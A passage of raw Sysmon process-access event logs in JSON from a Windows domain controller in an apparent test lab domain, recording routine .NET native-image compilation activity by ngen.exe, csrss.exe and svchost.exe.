05:58:41.824","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001009EF0C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7018,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.824\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001009EF0C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.824","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001009EF0C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7019,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.824\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001009EF0C00}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.824","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001009EF0C00}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7020,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.871\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0486-5F25-0000-0010124A0D00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.871","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0486-5F25-0000-0010124A0D00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7021,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.871\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0486-5F25-0000-0010124A0D00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.871","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0486-5F25-0000-0010124A0D00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7022,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.871\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0486-5F25-0000-0010124A0D00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.871","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0486-5F25-0000-0010124A0D00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7023,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.965\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010890E0E00}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.965","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010890E0E00}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7024,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.965\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010890E0E00}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:41.965","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-0010890E0E00}","TargetProcessId":"1204","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:41","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7025,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:41.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-0010890E0E00}\r\nTargetProcessId: 1204\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 